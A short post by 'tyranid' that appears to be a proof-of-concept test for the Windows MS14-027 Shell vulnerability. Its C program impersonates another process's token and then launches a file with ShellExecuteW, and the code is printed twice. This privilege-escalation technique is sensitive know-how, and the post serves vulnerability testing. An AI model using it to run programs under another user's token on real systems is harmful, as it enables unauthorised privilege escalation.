tyranid · May 22, 2014 01:23
diff --git a/Test for MS14-027 b/Test for MS14-027
 #include <stdio.h>
 #include <tchar.h>
 #include <Windows.h>

 int wmain(int argc, WCHAR* argv[])
 {	
 	if (argc < 2)
 	{
 		printf("Usage: ImpersonateSHExec filename [sessionid]\n");
 		return 1;
 	}

 	CoInitialize(nullptr);	
 	
 	if (argc > 2)
 	{
 		DWORD pid = wcstoul(argv[2], 0, 0);
 		HANDLE hProcess;
 		HANDLE hToken;

 		hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);

 		if (hProcess == nullptr)
 		{
 			printf("Error opening process %d\n", GetLastError());
 			return 1;
 		}

 		if (!OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &hToken))
 		{
 			printf("Error getting user token %d\n", GetLastError());
 			return 1;
 		}

 		if(!ImpersonateLoggedOnUser(hToken))
 		{
 			printf("Error impersonating user token %d\n", GetLastError());
 			return 1;
 		}
 	}

 	printf("Return: %d\n", ShellExecuteW(nullptr, L"open", argv[1], L"", nullptr, SW_SHOW));

 	CoUninitialize();

 	return 0;
 }
	#include <stdio.h>
	#include <tchar.h>
	#include <Windows.h>

	int wmain(int argc, WCHAR* argv[])
	{
	if (argc < 2)
	{
	printf("Usage: ImpersonateSHExec filename [sessionid]\n");
	return 1;
	}

	CoInitialize(nullptr);

	if (argc > 2)
	{
	DWORD pid = wcstoul(argv[2], 0, 0);
	HANDLE hProcess;
	HANDLE hToken;

	hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);

	if (hProcess == nullptr)
	{
	printf("Error opening process %d\n", GetLastError());
	return 1;
	}

	if (!OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &hToken))
	{
	printf("Error getting user token %d\n", GetLastError());
	return 1;
	}

	if(!ImpersonateLoggedOnUser(hToken))
	{
	printf("Error impersonating user token %d\n", GetLastError());
	return 1;
	}
	}

	printf("Return: %d\n", ShellExecuteW(nullptr, L"open", argv[1], L"", nullptr, SW_SHOW));

	CoUninitialize();

	return 0;
	}